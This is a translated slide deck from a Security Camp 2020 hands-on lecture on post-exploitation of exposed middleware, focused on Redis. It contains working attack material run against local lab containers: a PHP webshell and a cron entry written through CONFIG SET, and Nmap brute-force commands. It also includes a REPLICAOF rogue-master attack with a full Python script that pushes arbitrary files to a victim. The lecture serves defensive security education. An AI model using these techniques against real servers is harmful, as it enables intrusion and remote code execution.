Security Camp National Convention 2020 Online
Learn the essential way of thinking about vulnerabilities
through post-exploitation on middlewares
Teppei Fukuda (@knqyf263)
Taichi Kotake (@tkmru)
Agenda
• Why learn post-exploitation?
• What can an attacker do once logged in to a middleware?
• MySQL
• PostgreSQL (hands-on)
• Redis (hands-on)
• Docker
• Exercises
About me
• Name: Teppei Fukuda (@knqyf263)
• Affiliation: Aqua Security Software Ltd.
  Open Source Team
  Open Source Engineer
• Location: Tel Aviv, Israel
About me
• Name: Taichi Kotake (@tkmru)
• Affiliation: Akatsuki Inc.
  Security Engineer
• Location: Tokyo
• Publications
  • WEB+DB PRESS Vol. (number not recoverable), special feature "Easy with tools! Your first vulnerability assessment" (Gijutsu-Hyohron)
  • "Reverse engineering tool Ghidra: a practical guide" (Mynavi Publishing)
Why learn post-exploitation?
What is post-exploitation?
• Carlos Perez (Metasploit development team)
• "Shell is Only the Beginning"
• The actions taken after an exploit has succeeded
• What matters is what the attacker does after getting in
• Examples
  • Privilege escalation
  • Obtaining passwords and password hashes
  • Keyloggers
  • Packet sniffers
  • etc.
(Figure: escalation of impact, STEP 01 to STEP 05)
STEP 01: Was only dummy data from the development environment stolen?
STEP 02: Was root on the development server taken?
STEP 03: Was the production server compromised?
STEP 04: Was Active Directory compromised?
STEP 05: Was personal data stolen from the DB?
Understanding the intrusion and the scope of the compromise is important.
(Figure: the same STEP 01 to STEP 05)
Learn the attack methods used after an intrusion.
The impact is completely different: dummy data vs. personal data vs. employee data.
Know what the attacker was able to do after getting in.
Real-world cases
(Figure: screenshots of news articles)
Middleware exposed by mistake
• Through misconfiguration or low security awareness, middleware is very often exposed on the Internet with no authentication (or, if any, weak authentication)
• Redis
• Elasticsearch
• Docker API
• MySQL
• PostgreSQL
• etc.
Attackers can log in at will.
Slide 19
Slide 19 text
(Diagram: Internet and a server on a private network, versus Internet and a server placed directly on a public network)
Slide 20
Slide 20 text
How to log in to a DB server
Example commands
• MySQL
  mysql -u root -h <IP address>
• PostgreSQL
  psql -U postgres -h <IP address>
• Redis
  redis-cli -h <IP address>
Slide 21
Slide 21 text
Brute-forcing DB servers
NSE (Nmap Scripting Engine)
• Even when authentication is enabled, weak credentials are easy to break
• Scripts bundled with Nmap can run brute-force attacks
• Nmap ships with a scripting engine (NSE)
• Example: nmap -v -p <port> --script mysql-brute <IP address>
• Attackers can attack easily
Slide 22
Slide 22 text
Logged in! Is that the end?
"Middleware Exploitation is Only the Beginning"
Teppei Fukuda
• Redis has a feature that writes its key/values out to a file, and the destination can be changed with Redis commands
• So data can be written to any location on the server
Method using CONFIG SET
$ redis-cli
127.0.0.1:6379> config get dir
1) "dir"
2) "/data"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "dump.rdb"
Try dumping the data
$ docker run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0
$ docker exec -it redis bash
root@824e916202fd:/data# redis-cli
127.0.0.1:6379> set foo bar
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
root@824e916202fd:/data# cat dump.rdb
REDIS0009 redis-ver5.0.10
redis-bits@ctimeused-mem
aof-preamblefoobarb_
The file is serialized, but the saved key foo and value bar can be seen in it.
• Start the image prepared for the lecture and log in with redis-cli
• Also open http://localhost:10080 in a browser and confirm that phpinfo is displayed
Try it for real (webshell)
$ docker rm -f redis
$ docker run -d --name redis -p 127.0.0.1:10080:80 -p 127.0.0.1:6379:6379 knqyf263/redis-configset-webshell
$ redis-cli
127.0.0.1:6379> ping
PONG
• phpinfo shows that /usr/share/nginx/html is the document root, so point config set dir at it
• Because the file is a DB dump it contains garbage, but only the part enclosed in <?php ?> is interpreted as PHP, so the garbage before and after it does no harm
Write a PHP file (webshell)
127.0.0.1:6379> config set dir /usr/share/nginx/html
OK
127.0.0.1:6379> config set dbfilename redis.php
OK
127.0.0.1:6379> set test '<?php system($_GET["cmd"]); ?>'
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
• Confirm that commands are executed with http://localhost:10080/redis.php?cmd=id or similar
• http://localhost:10080/redis.php?cmd=touch bar or similar creates a file
• Actually log in to the container and confirm that the file has been created
Check (webshell)
$ docker exec -it redis bash
root@6b3e28756441:/data# ls /usr/share/nginx/html/
bar index.html index.php redis.php
root@6b3e28756441:/data# cat /usr/share/nginx/html/redis.php
REDIS0009 redis-ver5.0.10
redis-bits@ctimeused-mem
aof-preambletest'<?php system($_GET["cmd"]); ?>'
Garbage surrounds it, but the <?php ?> block has been written correctly.
• This time, write to /var/spool/cron/root
• Note: an ordinary (non-root) user normally has no write permission to that directory
• Garbage gets in, but cron interprets the file line by line, so wrapping the entry in newlines makes it work
Write a cron entry
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
$ telnet localhost 6379
SYNC
...
*2
$6
SELECT
$1
0
*3
$3
set
$3
foo
$3
bar
$ redis-cli
127.0.0.1:6379> set foo bar
OK
Select the DB: SELECT 0
Store the key/value: set foo bar
The replica simply executes these commands.
Abusing REPLICAOF
• With REPLICAOF, an ordinary Redis instance can be forcibly turned into a replica
• If the attacker's machine is made the master, the replica sends SYNC to it
(Diagram: Victim (Replica) and Attacker; REPLICAOF sets the Attacker as Master; SYNC/PSYNC flows from the Replica)
Arbitrary Redis commands can be issued to the replica
• Impersonate the master and forward arbitrary commands; the replica executes them
(Diagram: Attacker and Replica; REPLICAOF sets the Attacker as Master; SYNC/PSYNC; RDB file; arbitrary commands streamed in)
Arbitrary Redis commands can be issued to the replica
• Effective in situations where responses cannot be read, such as via SSRF
• Works even when Redis is not exposed to the Internet
(Diagram: Attacker sends a Request to a vulnerable web server, which relays REPLICAOF to an in-house Redis; that Redis then sends SYNC to the Attacker)
Arbitrary Redis commands can be issued to the replica
• Actually getting responses back takes a little more work
• This lecture assumes you can already reach Redis (for example one exposed on the Internet), so arbitrary Redis commands can be executed and their responses read from the start
https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
(Diagram: Attacker to Redis: arbitrary Redis commands)
Hands-on environment
• Connections from Redis must be accepted, so we use docker-compose
• Two containers are running: rogue and redis
• Basically, log in to rogue and work from there
(Diagram: docker-compose runs rogue (attack environment) and redis (victim Redis); redis-cli from rogue; docker-compose exec into rogue)
$ cd <any directory>
$ wget https://gist.githubusercontent.com/knqyf263/16232934bd772ee9f8c76f4a10447aa2/raw/fa6638ca34f279b1d5f06d1ddf2f83079589fe5b/docker-compose.yml
$ docker-compose up -d
$ docker-compose exec rogue bash
Starting the environment
• Change to any directory and download docker-compose.yml
• Start docker-compose and log in to rogue with exec
If a container dies during the hands-on, run docker-compose down and then docker-compose up -d again
(a malformed RDB file can crash it)
Setting up REPLICAOF
• Log in to redis from rogue with redis-cli
• Use the REPLICAOF command to set port 10000 on rogue as the master
• Thanks to docker-compose, the name rogue resolves
(Diagram: after REPLICAOF rogue 10000, redis connects to rogue as a replica of its new master)
root@b6d0575dafc4:/rogue# redis-cli -h redis replicaof rogue 10000
The Netcat command
• A command that starts a simple client or server process
• Options
  • -l  listen mode, for inbound connects
  • -p  port: local port number
  • -k  set keepalive option on socket
root@b6d0575dafc4:/rogue# nc -klp 10000
*1
$4
PING
A PING has arrived from the replica.
https://linux.die.net/man/1/nc
PSYNC
• Command for resuming synchronization part-way
• The master advances only by the offset and returns just the difference
• PSYNC <replication_id> <offset>
• replication_id is 40 characters long
• For the first sync the replica has neither, so it sends something like PSYNC ? -1
*3
$5
PSYNC
$40
d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689
$1
1
Attacking PSYNC (1/2)
• Reply to the PSYNC with an acknowledgement (OK); the replica then falls back to a plain SYNC, so send the payload in response to that
• On a first sync the RDB file is empty, so this alone lets us write an arbitrary file
(Diagram: rogue and redis: PSYNC, OK, SYNC, arbitrary data)
Summary so far (Redis REPLICAOF)
• The attacker can issue arbitrary Redis commands to the target Redis
• Use REPLICAOF to make the target server a replica
• At the same time, make the attacker's server the master
• Make the replica issue SYNC/PSYNC, return an arbitrary payload, and write whatever data you like into dump.rdb
We still do not have an OS shell!!
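The exchange summarized above, automated as an added example (this is not code from the slides, nor the redis-rogue-server tool placed in the rogue container). The script plays the rogue master: it answers PING and REPLCONF, replies OK to PSYNC so the replica falls back to SYNC, and then sends an arbitrary payload as the bulk "RDB" that the replica stores as <dir>/<dbfilename>. The replies (+PONG, +OK, $<len> bulk with no trailing CRLF) are standard Redis replication behaviour; the function names and the loopback self-check are assumptions of this example.

```python
import socket
import threading

# Constructed example, not code from the slides or from redis-rogue-server:
# a minimal rogue Redis master that completes the handshake `nc -klp 10000`
# above only lets you watch, then hands the replica an arbitrary payload.


def encode_command(*args) -> bytes:
    """RESP array framing (the replication stream carries the same shape)."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def _read_line(reader) -> bytes:
    line = reader.readline()
    if not line:
        raise ConnectionError("peer closed")
    return line.rstrip(b"\r\n")


def read_command(reader) -> list:
    """Parse one command from the replica: RESP array, or inline text (telnet)."""
    head = _read_line(reader)
    if not head.startswith(b"*"):
        return head.split()
    args = []
    for _ in range(int(head[1:])):
        args.append(reader.read(int(_read_line(reader)[1:])))
        reader.read(2)  # CRLF that terminates each bulk string
    return args


def serve_replica(conn: socket.socket, payload: bytes) -> list:
    """Answer PING/REPLCONF/PSYNC/SYNC from one replica; return the commands seen.
    `payload` is stored verbatim by the replica as <dir>/<dbfilename>."""
    seen = []
    with conn, conn.makefile("rb") as reader:
        while True:
            try:
                cmd = read_command(reader)
            except ConnectionError:
                break
            if not cmd:
                continue
            name = cmd[0].upper()
            seen.append(name)
            if name == b"PING":
                conn.sendall(b"+PONG\r\n")
            elif name == b"REPLCONF":
                conn.sendall(b"+OK\r\n")  # listening-port / capa: accept anything
            elif name == b"PSYNC":
                # Anything but +FULLRESYNC/+CONTINUE makes the replica drop
                # partial sync and retry with a plain SYNC (the OK in the diagram).
                conn.sendall(b"+OK\r\n")
            elif name == b"SYNC":
                # Full sync is a single bulk string with no trailing CRLF; the
                # replica writes these bytes to disk without inspecting them.
                conn.sendall(b"$%d\r\n%s" % (len(payload), payload))
                break
            else:
                conn.sendall(b"-ERR unknown command\r\n")
    return seen


def rogue_master(payload: bytes, host: str = "0.0.0.0", port: int = 10000) -> None:
    """Listen like `nc -klp 10000`, but finish the handshake automatically."""
    with socket.create_server((host, port)) as srv:
        while True:
            conn, peer = srv.accept()
            print(f"replica {peer[0]}:{peer[1]} sent {serve_replica(conn, payload)}")


def simulate_exchange(payload: bytes) -> dict:
    """Offline self-check: play the replica side over loopback and return what
    each side saw, so the protocol can be verified without a real Redis."""
    srv = socket.create_server(("127.0.0.1", 0))
    result = {}

    def accept_one():
        conn, _ = srv.accept()
        result["master_saw"] = serve_replica(conn, payload)

    worker = threading.Thread(target=accept_one)
    worker.start()
    with socket.create_connection(srv.getsockname()) as replica:
        reader = replica.makefile("rb")
        replica.sendall(encode_command("PING"))
        result["pong"] = _read_line(reader)
        replica.sendall(encode_command("REPLCONF", "listening-port", 6379))
        _read_line(reader)
        replica.sendall(encode_command("PSYNC", "?", -1))
        result["psync_reply"] = _read_line(reader)
        replica.sendall(encode_command("SYNC"))  # the fallback a real replica performs
        result["file"] = reader.read(int(_read_line(reader)[1:]))
    worker.join()
    srv.close()
    return result


if __name__ == "__main__":
    # Same cron line the slides wrote via CONFIG SET. For MODULE LOAD the payload
    # would be open("exp.so", "rb").read() with dbfilename set to exp.so.
    rogue_master(b"\n*/1 * * * * /bin/touch /tmp/foo\n")
```

Run it on the attacker host, then on the victim issue config set dir / config set dbfilename followed by replicaof <attacker> 10000, exactly as in the hands-on. Once the bulk has been received the replica tries to load it as an RDB; a non-RDB payload fails that load, which is the crash the hands-on notes warn about, but the file is already on disk by then. REPLCONF is answered with a blanket OK on purpose: the master's only job here is to get the replica to SYNC.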
Arbitrary file write is possible
Redis Modules
Redis Modules
• Let you define your own commands
• A module can be loaded with MODULE LOAD
So all we need is a module that executes OS commands.
Redis Module (from Metasploit)
• Can easily be written in a small number of lines
• This lecture reuses Metasploit's code
• Writing your own is good practice
https://github.com/rapid7/metasploit-framework/blob/<commit>/data/exploits/redis/exp/exp.c
Injecting the Redis module
• Reset everything cleanly and start over
• The module is already placed in the rogue container (exp.so)
root@b6d0575dafc4:/rogue# exit
$ docker-compose down
$ docker-compose up -d
$ docker-compose exec rogue bash
root@d99f653690ed:/rogue# cd /data/redis-rogue-server/
root@d99f653690ed:/data/redis-rogue-server# ls exp.so
exp.so
Escaping from a Docker container
• When the container runs with --privileged
  • Using /dev
  • Using the cgroup notify_on_release (release_agent) mechanism
• When a vulnerable version of Docker is in use
• When a vulnerable kernel version is in use
There was no time to cover this; see the reference:
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes-up.pdf
Summary
• To grasp the scope of a compromise, you need to know what an attacker can do after getting in
• Learning post-exploitation helps with that
• As concrete examples, breaking into a middleware can lead to OS command execution
  • MySQL
  • PostgreSQL
  • Redis
  • Docker
  • etc.
• It is important to get hands-on and understand what happens under the hood
(Figure: kill chain: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Expansion of the intrusion, Actions on objectives; "Intrusion into the middleware: what is possible?")